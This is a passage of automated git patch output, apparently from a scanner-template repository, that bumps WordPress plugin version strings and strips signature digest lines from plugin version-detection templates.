4b0a004830460221009daf361941cf6a67b73fee3bb9226b6b67110d9c1335ebf49d0770b8684ce10f022100d3802939beeb74aa396c225600170a5e99f2dc8080a17ef6291414852f62b6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)Update\s+Access\s+Key\s+Exp\s+Date\s+\(YYYY-MM-DD\):\s+([0-9\-]+)' From f58cbc8438cc77e173d0ea2b1e6332a5269b374a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 00:19:28 +0000 Subject: [PATCH 0551/1841] Auto WordPress Plugins Update [Tue Jun 25 00:19:28 UTC 2024] :robot: --- helpers/wordpress/plugins/ad-inserter.txt | 2 +- helpers/wordpress/plugins/advanced-custom-fields.txt | 2 +- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/backwpup.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/insert-headers-and-footers.txt | 2 +- helpers/wordpress/plugins/newsletter.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/woocommerce.txt | 2 +- helpers/wordpress/plugins/wps-hide-login.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 210 files changed, 10 insertions(+), 210 deletions(-) diff --git a/helpers/wordpress/plugins/ad-inserter.txt b/helpers/wordpress/plugins/ad-inserter.txt index 44c2012635..d39d3b5cb4 100644 --- a/helpers/wordpress/plugins/ad-inserter.txt +++ b/helpers/wordpress/plugins/ad-inserter.txt @@ -1 +1 @@ -N/A \ No newline at end of file +2.7.35 \ No newline at end of file diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index 39ee137ba5..f9da12e118 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.3.1 \ No newline at end of file +6.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index 2533cac5ba..a6695ff98b 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -4.3.3 \ No newline at end of file +4.3.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/backwpup.txt b/helpers/wordpress/plugins/backwpup.txt index 2582dddfd5..99eba4de93 100644 --- a/helpers/wordpress/plugins/backwpup.txt +++ b/helpers/wordpress/plugins/backwpup.txt @@ -1 +1 @@ -4.1.1 \ No newline at end of file +4.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 50f12a4532..dbc9520ba4 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.22.1 \ No newline at end of file +3.22.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/insert-headers-and-footers.txt b/helpers/wordpress/plugins/insert-headers-and-footers.txt index b8424e111f..2922dcceba 100644 --- a/helpers/wordpress/plugins/insert-headers-and-footers.txt +++ b/helpers/wordpress/plugins/insert-headers-and-footers.txt @@ -1 +1 @@ -2.1.13 \ No newline at end of file +2.1.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index 9da0a092a0..f413137528 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -8.4.0 \ No newline at end of file +8.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 07b48341a8..d6880ca440 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.34 \ No newline at end of file +4.10.35 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index 6768f7e446..f202cd983c 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -9.0.1 \ No newline at end of file +9.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wps-hide-login.txt b/helpers/wordpress/plugins/wps-hide-login.txt index a8729d775f..360f7b2b10 100644 --- a/helpers/wordpress/plugins/wps-hide-login.txt +++ b/helpers/wordpress/plugins/wps-hide-login.txt @@ -1 +1 @@ -1.9.16.4 \ No newline at end of file +1.9.16.5 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index b65a5a4df0..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c389e8ec1910324962cfc9a6be17eff212e65f98b353c885bd319b8d49569aa502206dad80ed8cc27bcb21f9a10f0c5dd4cd83b454797a0a196008337d990d778be4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index b75323d5f2..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bd7fa56c9ded1d42d5751d2271a1c1055204c7c1c28a49574f6bc91e9f4e45b902203e9a15ac96f1b45b960658046c193fe3e61f8b3558729a759f1f37b1b5cdec95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index dcf0dd339b..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f73b2b685811a2aa5d466d16d0847b437020685207b55981258e3b592e7035002204b98947935a42308ceb782e479969f8b2641fd6ee885641ef98c26265f48003f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 2d47547e8a..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022056169e700d61aa5bf0414ee68e146a7f306b78ae85938a9f824a3a43d7067c31022100a722579d13527bcd738e9ee82906d81eac5b274671d6dd81f1af2624ff21ba9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index ef1ee732b8..f68ad2a6bf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022022ac58e34622aa637f2fdb3c28f7ae451fa2e0374b664cd0f03ee0915991aa9802210085bddd05800d2d9a4ec45ae14f809ff8c7b24c1bed195599c6e1d3f470ab54f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1f8285812c..196cc7e8e8 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022009de8f0f5ebcce302b212999a7826964342f8b526237adcb515454fdbf18d058022100aed5eafb075557fa537f5e8cb3b97b69041a8f37dba5f8cd87b38455eca86a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 6e0176234b..55362630df 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220607acc63f942de98489aa8c557ff634a7350a6573227e465ff2b32badbef25e00220798febe8ccd3d9f9248386fa96f705e4d5e9e1a51ff33b907c956fb5118f75df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 3e17c759e2..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009fc3170beb6398eab02896f3421a0b9ba060b0f00de0d812b94d37d55a7ddf5f022100f9fca9a66423562ea636a9faf831b1f7c67f4ece69d3487792a1f913813c726f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index d0276a7360..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207a1019a55580977361da21455545d1043e009e380971f0d7a1dd25fc53a4aa3f022100ca29c0763a86fe4bfce11c226898a0b10123b69d1bb66c329ab89e3bd634f586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 4f95e53a9f..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022022012ddcc9a54229dc21596229f0be2f68d58c1c5e4eb70e3f27c8af6fa9d1f602210081d705ad1f4de66126ee63a50526b4cf5a9bcd61f7828e0e6f43c919286d3af0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 35eb81270e..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee275ffe9efe7143e218d3eade9d26bed7108013356e47110db32a89df8ef4c302205ce741db785bcc748a27ad34eed5eb308abd31e630276d1062a007e5242a689e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 29403f28f0..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec53867aafda46f0a2446d9c374f9f72c709eae36fa0cbc77a21b0b5e88cfb0d02207bd5ae8d7984c42f73debd73e83b9be2461d73fc0643f6f07100c21baa0e5ac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index d069ce2da5..f76b750bf6 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204bd58654bac2d642ea296d9ce06ba4db88bca685238a9201e47e6f3b55f181f3022100cac4981337c78b57b47167f941f1f6d8c7f8fcc869b6fd68a964c17fe86fb17f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 40fd76ad5e..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220020e0706837ea63424564e30abce9d9ad03d4fa5c3d6a616556407dcb9c51ce30220552fb729733f3c17617c1ab15a5f666a6380d74a46fae182042dce6eb6e4bca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index bb9f98847f..d1e01c329b 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a26f632bab2fb351a38cef8e9b50df6ef4a648bc93ed5eaa550bed5651995d23022064d679b6d213f33488e5f97cd965fab6b16c5d93cd9e24d1a37a3289fcac1b10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index a37cd4f343..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ece728fa0dea44700e5cb8a0a02683523092aec6e5cda42e8be5f91864aa629a022100b22a17b2f9799ba16e7efa90ed190493ffd5365fb90a29617d755c136c0e0c9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 8246f82b32..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022032ea2c1890ccb5cf5012ba229670d28c90d637f904ae4024899b50b2a5cf2a8902201963d712871a685e9383eead84ff244dada4661146bdcb01a6a466e7b8cedad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 66c03a54e8..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100efb7998a849b09e7a06886685ba4bd81c1e2db0a6c12a28d9196f616f997d0170220295ac4be89935175917218eae8ea73b8f77d5af04a4c0b9b0c96686e90266d97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 7ba0f28f25..f3aae5f624 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022054515657ff4a7d1b0a466bbfa96e023add7a6fee01d5acbf20924d90d64d2329022100c2a043583a08d5a905da343bbf0cc130a1e0acb7763bc0c314f12fe34afe7e02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 1683ea688d..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e7193b8d4bbd60d9b6f8a0a152c7c33fbdf4524456a13c6f76bb4c9c28d304e02205e19137f0ee967914ad361a814d31869af50df332e64dbf32243426ae54df553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 3e56eebb11..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,4 +47,3 